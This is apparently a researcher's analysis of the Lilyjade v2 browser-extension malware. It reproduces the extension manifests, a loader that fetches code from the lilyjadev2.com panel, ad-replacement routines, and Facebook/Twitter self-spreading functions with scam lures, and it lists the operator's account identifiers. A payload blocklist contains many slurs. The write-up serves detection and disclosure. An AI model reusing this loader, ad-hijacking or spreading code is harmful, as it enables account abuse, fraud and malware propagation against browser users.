lilyjadev2.com (Malicious browser extension Hosted in the United States by Endicott H4y Technologies Llc)

After posting the latest browser extension malware, I decided to check up on the first one posted on this site, Lilyjade. While all of the reported hosts had been shut down, I located a new one, which claimed to host Lilyjade version 2.

Here's a look at the new version of the Lilyjade malware.

The first change is the lack of Crossrider. While the first version used that cross-browser extension framework to provide extensions for both Chrome and Firefox, v2 takes a different approach to each browser.
The Chrome extension is hosted on, and updated from, a public Dropbox share (the plain-HTTP `update_url` in the manifest below), so the operator can push new builds without any store review. There are no signs that it was created with a cross-browser extension site. Note what the manifest asks for: a content script injected into every frame of every URL (`<all_urls>` with `all_frames`), plus the `tabs` permission — enough to read and rewrite any page the victim loads.

{
   "manifest_version": 2,
   "content_scripts": [ {
      "all_frames": true,
      "js": [ "go.js" ],
      "matches": [ "u003Call_urlsu003E" ]
   } ],
   "description": "Required System Extension",
   "icons": {
      "128": "icon128.png",
      "16": "icon16.png",
      "48": "icon48.png"
   },
   "background": {
    "scripts": ["background.js"]
   },
   "name": "YouTube Stability Engine",
   "permissions": [ "<all_urls>" , "unlimitedStorage", "tabs"],
  "version": "2.6.0",
  "update_url": "http://dl.dropbox.com/u/64537922/lj/update.xml"
}

The Firefox extension is much larger and appears to be the Chrome extension converted using extensionfactory.com, which adds a wrapper to run Chrome extension code on Firefox; its `em:updateURL` accordingly points at the extensionfactory gallery rather than at the operator's own host. The main extension code is the same as in the Chrome extension.

 <Description about="urn:mozilla:install-manifest">
    <em:name>YouTube Stability Engine</em:name>
    <em:unpack>true</em:unpack>
    <em:bootstrap>true</em:bootstrap>
    <em:updateURL>https://gallery.extensionfactory.com/labs/conversion/update/miophknchcebolnhaahfcolbccopgaga/</em:updateURL>
    <em:version>2.6.0</em:version>
    <em:targetApplication>
      <Description>
        <em:minVersion>4.0</em:minVersion>
        <em:maxVersion>99.*</em:maxVersion>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      </Description>
    </em:targetApplication>
    <em:type>2</em:type>
    <em:id>miophknchcebolnhaahfcolbccopgaga@slicefactory.com</em:id>
    <em:description>Required System Extension</em:description>
  </Description>

The main part of the extension is the background.js file, which downloads and runs a JavaScript file from the control panel. In other words the installed extension is only a loader: its behaviour is whatever the panel serves at fetch time, so the static files alone do not tell you what a particular victim's browser is doing, and blocking the Dropbox update host alone does nothing against this channel.
For this version of Lilyjade, the payload is fetched (over plain HTTP) from:

http://lilyjadev2.com/panel/cache/6ad01eb4c2c1405636a6b85678506e8d.js
This script contains the code necessary for replacing ads, posting on Facebook and Twitter, and the analytics code for tracking the number of infected browsers.

// Injects the Amazon Associates widget loader into <body> via $LAB and, once
// that script has executed, calls renderMarkup on the element `id` names,
// forwarding `callback` unchanged.
// NOTE(review): $LAB (LABjs), $$ and renderMarkup are defined elsewhere in
// the payload; this reproduces the malware's call sequence verbatim.
function loadWidget(id, callback) {
    var widgetSrc = "http://ws.amazon.com/widgets/q?ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/enz-20/8001/25a54e74-2ee7-4e6c-8e3c-bd913fdcec00";
    var loader = $LAB.setOptions({ AppendTo: "body" });
    var onLoaded = function () {
        renderMarkup($$(id), callback);
    };
    loader.script({
        charset: "utf-8",
        type: "text/javascript",
        src: widgetSrc
    }).block(onLoaded);
}

// Loads Google Analytics ga.js (scheme chosen to match the current page),
// renders the markup for `id`, then records a pageview against the
// operator's tracker UA-10493018-2 before invoking `callback`.
// Tracker failures (ga.js blocked or not yet initialised) are ignored so
// the callback still runs.
// NOTE(review): $LAB, $$ and renderMarkup come from elsewhere in the payload.
function loadAnalytics(id, callback) {
    var secure = "https:" === document.location.protocol;
    var gaHost = secure ? "https://ssl." : "http://www.";
    var trackPageview = function () {
        try {
            var tracker = window._gat._getTracker("UA-10493018-2");
            tracker._trackPageview();
        } catch (err) {
            // Swallowed on purpose (as in the original): analytics must never
            // break the rest of the chain.
        }
        callback();
    };
    $LAB.setOptions({ AppendTo: "body" })
        .script({ type: "text/javascript", src: gaHost + "google-analytics.com/ga.js" })
        .block(function () {
            renderMarkup($$(id), trackPageview);
        });
}

The ad-replacing code has a simplistic filter that checks the domain name of the visited site against a long wildcard blocklist of adult and profane terms, in an attempt to avoid suspension of the AdSense account. Note that in the listing below the blocklist gates the `initWindow()` / `FacebookSpread()` / `TwitterSpread()` branch (taken when no ad parameters are supplied); the AdSense call itself is on the other branch, so the exact relationship between the filter and the ad slots depends on code not shown here.

// Entry point of the served payload. With a full set of ad parameters it
// replaces the page's onload handling and schedules an AdSense unit for
// publisher ca-pub-8295585119185751; without them it falls through to the
// spreading routines, but only when the current domain matches none of the
// wildcard terms handed to domainMatch (a profanity/adult-term blocklist).
//   w, h - ad slot dimensions (only null-checked here; passed to loadAds)
//   aid  - ad slot id (passed to loadAds)
//   rand - passed to loadAds; its meaning is not visible in this listing
// NOTE(review): windowOnload, captureOnloadListeners, captureMarkup,
// loadAds, domainMatch, initWindow, FacebookSpread and TwitterSpread are
// defined elsewhere in the payload. domainMatch is assumed to test the
// current document's domain against its glob arguments — confirm in the
// full file.
function replaceAd(w, h, aid, rand) {
    if (w != null && h != null && aid != null && rand != null) {
        windowOnload();
        captureOnloadListeners();
        // The page's own onload is cleared, presumably after the call above
        // has saved it — the original page handlers are now the malware's.
        window.onload = null;
        captureMarkup();
        // 250 ms delay before injecting the ad; the reason is not visible here.
        window.setTimeout(function () {
            loadAds(rand, w, h, "ca-pub-8295585119185751", aid);
        }, 250);
    } else {
        // Propagate only on domains that match none of these patterns.
        if (!domainMatch("*ahole*", "*anus*", "*ash0le*", "*ash0les*", "*asholes*", "*ass*", "*Ass Monkey*", "*Assface*", "*assh0le*", "*assh0lez*", "*asshole*", "*assholes*", "*assholz*", "*asswipe*", "*azzhole*", "*bassterds*", "*bastard*", "*bastards*", "*bastardz*", "*basterds*", "*basterdz*", "*Biatch*", "*bitch*", "*bitches*", "*Blow Job*", "*boffing*", "*butthole*", "*buttwipe*", "*c0ck*", "*c0cks*", "*c0k*", "*Carpet Muncher*", "*cawk*", "*cawks*", "*Clit*", "*cnts*", "*cntz*", "*cock*", "*cockhead*", "*cock-head*", "*cocks*", "*CockSucker*", "*cock-sucker*", "*crap*", "*cum*", "*cunt*", "*cunts*", "*cuntz*", "*dick*", "*dild0*", "*dild0s*", "*dildo*", "*dildos*", "*dilld0*", "*dilld0s*", "*dominatricks*", "*dominatrics*", "*dominatrix*", "*dyke*", "*enema*", "*f u c k*", "*f u c k e r*", "*fag*", "*fag1t*", "*faget*", "*fagg1t*", "*faggit*", "*faggot*", "*fagit*", "*fags*", "*fagz*", "*faig*", "*faigs*", "*fart*", "*flipping the bird*", "*fuck*", "*fucker*", "*fuckin*", "*fucking*", "*fucks*", "*Fudge Packer*", "*fuk*", "*Fukah*", "*Fuken*", "*fuker*", "*Fukin*", "*Fukk*", "*Fukkah*", "*Fukken*", "*Fukker*", "*Fukkin*", "*g00k*", "*gay*", "*gayboy*", "*gaygirl*", "*gays*", "*gayz*", "*God-damned*", "*h00r*", "*h0ar*", "*h0re*", "*hells*", "*hoar*", "*hoor*", "*hoore*", "*jackoff*", "*jap*", "*japs*", "*jerk-off*", "*jisim*", "*jiss*", "*jizm*", "*jizz*", "*knob*", "*knobs*", "*knobz*", "*kunt*", "*kunts*", "*kuntz*", "*Lesbian*", "*Lezzian*", "*Lipshits*", "*Lipshitz*", "*masochist*", "*masokist*", "*massterbait*", "*masstrbait*", "*masstrbate*", "*masterbaiter*", "*masterbate*", "*masterbates*", "*Motha Fucker*", "*Motha Fuker*", "*Motha Fukkah*", "*Motha Fukker*", "*Mother Fucker*", "*Mother Fukah*", "*Mother Fuker*", "*Mother Fukkah*", "*Mother Fukker*", "*mother-fucker*", "*Mutha Fucker*", "*Mutha Fukah*", "*Mutha Fuker*", "*Mutha Fukkah*", "*Mutha Fukker*", "*n1gr*", "*nastt*", "*nigger;*", "*nigur;*", "*niiger;*", "*niigr;*", "*orafis*", 
"*orgasim;*", "*orgasm*", "*orgasum*", "*oriface*", "*orifice*", "*orifiss*", "*packi*", "*packie*", "*packy*", "*paki*", "*pakie*", "*paky*", "*pecker*", "*peeenus*", "*peeenusss*", "*peenus*", "*peinus*", "*pen1s*", "*penas*", "*penis*", "*penis-breath*", "*penus*", "*penuus*", "*Phuc*", "*Phuck*", "*Phuk*", "*Phuker*", "*Phukker*", "*polac*", "*polack*", "*polak*", "*Poonani*", "*pr1c*", "*pr1ck*", "*pr1k*", "*pusse*", "*pussee*", "*pussy*", "*puuke*", "*puuker*", "*queer*", "*queers*", "*queerz*", "*qweers*", "*qweerz*", "*qweir*", "*recktum*", "*rectum*", "*retard*", "*sadist*", "*scank*", "*schlong*", "*screwing*", "*semen*", "*sex*", "*sexy*", "*Sh!t*", "*sh1t*", "*sh1ter*", "*sh1ts*", "*sh1tter*", "*sh1tz*", "*shit*", "*shits*", "*shitter*", "*Shitty*", "*Shity*", "*shitz*", "*Shyt*", "*Shyte*", "*Shytty*", "*Shyty*", "*skanck*", "*skank*", "*skankee*", "*skankey*", "*skanks*", "*Skanky*", "*slut*", "*sluts*", "*Slutty*", "*slutz*", "*son-of-a-bitch*", "*tit*", "*turd*", "*va1jina*", "*vag1na*", "*vagiina*", "*vagina*", "*vaj1na*", "*vajina*", "*vullva*", "*vulva*", "*w0p*", "*wh00r*", "*wh0re*", "*whore*", "*xrated*", "*xxx*", "*b!+ch*", "*bitch*", "*blowjob*", "*clit*", "*arschloch*", "*fuck*", "*shit*", "*ass*", "*asshole*", "*b!tch*", "*b17ch*", "*b1tch*", "*bastard*", "*bi+ch*", "*boiolas*", "*buceta*", "*c0ck*", "*cawk*", "*chink*", "*cipa*", "*clits*", "*cock*", "*cum*", "*cunt*", "*dildo*", "*dirsa*", "*ejakulate*", "*fatass*", "*fcuk*", "*fuk*", "*fux0r*", "*hoer*", "*hore*", "*jism*", "*kawk*", "*l3itch*", "*l3i+ch*", "*lesbian*", "*masturbate*", "*masterbat*", "*masterbat3*", "*motherfucker*", "*s.o.b.*", "*mofo*", "*nazi*", "*nigga*", "*nigger*", "*nutsack*", "*phuck*", "*pimpis*", "*pusse*", "*pussy*", "*scrotum*", "*sh!t*", "*shemale*", "*shi+*", "*sh!+*", "*slut*", "*smut*", "*teets*", "*tits*", "*boobs*", "*b00bs*", "*teez*", "*testical*", "*testicle*", "*titt*", "*w00se*", "*jackoff*", "*wank*", "*whoar*", "*whore*", "*damn*", "*dyke*", 
"*fuck*", "*shit*", "*@$$*", "*amcik*", "*andskota*", "*arse*", "*assrammer*", "*ayir*", "*bi7ch*", "*bitch*", "*bollock*", "*breasts*", "*butt-pirate*", "*cabron*", "*cazzo*", "*chraa*", "*chuj*", "*Cock*", "*cunt*", "*d4mn*", "*daygo*", "*dego*", "*dick*", "*dike*", "*dupa*", "*dziwka*", "*ejackulate*", "*Ekrem*", "*Ekto*", "*enculer*", "*faen*", "*fag*", "*fanculo*", "*fanny*", "*feces*", "*feg*", "*Felcher*", "*ficken*", "*fitt*", "*Flikker*", "*foreskin*", "*Fotze*", "*fuk*", "*futkretzn*", "*gay*", "*gook*", "*guiena*", "*h0r*", "*h4x0r*", "*hell*", "*helvete*", "*hoer*", "*honkey*", "*Huevon*", "*hui*", "*injun*", "*jizz*", "*kanker*", "*kike*", "*klootzak*", "*kraut*", "*knulle*", "*kuk*", "*kuksuger*", "*Kurac*", "*kurwa*", "*kusi*", "*kyrpa*", "*lesbo*", "*mamhoon*", "*masturbat*", "*merd*", "*mibun*", "*monkleigh*", "*mouliewop*", "*muie*", "*mulkku*", "*muschi*", "*nazis*", "*nepesaurio*", "*nigger*", "*orospu*", "*paska*", "*perse*", "*picka*", "*pierdol*", "*pillu*", "*pimmel*", "*piss*", "*pizda*", "*poontsee*", "*poop*", "*porn*", "*p0rn*", "*pr0n*", "*preteen*", "*pula*", "*pule*", "*puta*", "*puto*", "*qahbeh*", "*queef*", "*rautenberg*", "*schaffer*", "*scheiss*", "*schlampe*", "*schmuck*", "*screw*", "*sh!t*", "*sharmuta*", "*sharmute*", "*shipal*", "*shiz*", "*skribz*", "*skurwysyn*", "*sphencter*", "*spic*", "*spierdalaj*", "*splooge*", "*suka*", "*b00b*", "*testicle*", "*titt*", "*twat*", "*vittu*", "*wank*", "*wetback*", "*wichser*", "*wop*", "*yed*", "*zabourah*")) {
            initWindow();
            FacebookSpread();
            TwitterSpread();
        }
    }
}

There also appears to be a function for replacing Amazon widgets with one coded into the extension (the `loadWidget` listing above carries the operator's Associates ID).
The Facebook posting has expanded to liking pages and creating events, as well as posting onto the wall of the affected account.
The Twitter spread simply tweets the selected message from the affected account.

Controlling these functions is done from the JavaScript itself, with the spreading text and the selected options coded into the served file rather than sent as commands. The panel appears to simply rewrite the .js file, which could easily be done by hand if anyone were inclined to use Lilyjade for free — and it also means a defender who captures the file gets the complete current campaign configuration in one place.

// Campaign switches baked into the served payload (per the write-up, the
// panel rewrites this file rather than sending commands). A value of 1
// enables the feature where the flag is checked; only the three Facebook
// flags are consumed in the code shown on this page.
var aduse = 1;      // presumably gates ad replacement — not referenced in the visible code
var spreaduse = 1;  // Facebook wall post via sharePage() (see FacebookSpread)
var likeuse = 1;    // Facebook page like via likePage() (see FacebookSpread)
var eventuse = 1;   // Facebook event creation via createEvent() (see FacebookSpread)
var tweetuse = 1;   // presumably gates TwitterSpread — not referenced in the visible code
var htmlsrc = "";   // written/read elsewhere in the payload; usage not shown here
var ROOTSERVER = "lilyjadev2.com"; // the panel/C2 host this payload was served from

// Runs the Facebook propagation once per victim browser: only on facebook.com
// (and when isFacebook() agrees), and only while no "spread" cookie exists.
// Each action is gated by its campaign flag — likePage(), the "iPhone 5 beta"
// lure via sharePage(), and a fake YouTube giveaway event via createEvent() —
// after which the cookie is set so the routine does not fire again.
// NOTE(review): isFacebook, getCookie, setCookie, likePage, sharePage and
// createEvent are defined elsewhere in the payload.
function FacebookSpread() {
    var onFacebook = (document.domain).toLowerCase() == "facebook.com" && isFacebook();
    if (!onFacebook) {
        return;
    }
    if (getCookie("spread") != null) {
        return;
    }
    if (likeuse == 1) {
        likePage();
    }
    if (spreaduse == 1) {
        sharePage("http://i.imgur.com/yW4BA.jpg", "http://faecbook.nazuka.net/pop.html", "iPhone 5 beta for Free!!!", "At last The Beta of iPhone 5 is out!", "Here's your chance to get the iPhone 5 beta for free! Go to : http://j.gs/868755/iphone5", "30713015083");
    }
    if (eventuse == 1) {
        createEvent("Free Youtube Goodies, Tshirts and more!", "Youtube is giving out cool stuff like tshirts,watches and much more! Take yours from here http://faecbook.nazuka.net");
    }
    setCookie("spread", "active", 1);
}

The AdSense account affiliated with the extension — and, since it is where the money goes, a more durable handle on the operator than hosting that changes with every takedown — is

ca-pub-8295585119185751

The Google Analytics account is

UA-10493018-2

The Amazon widget account is

25a54e74-2ee7-4e6c-8e3c-bd913fdcec00

The Dropbox account used for update checks and distributing the extension is

/u/64537922/

(This account has been used in the past to distribute malware)

The website used for the current spreading campaign is

http://faecbook.nazuka.net

Download containing both extensions and the current 6ad01eb4c2c1405636a6b85678506e8d.js file (live malware — unpack and examine it only in an isolated analysis environment): Download
Hosting info: http://whois.domaintools.com/199.83.213.170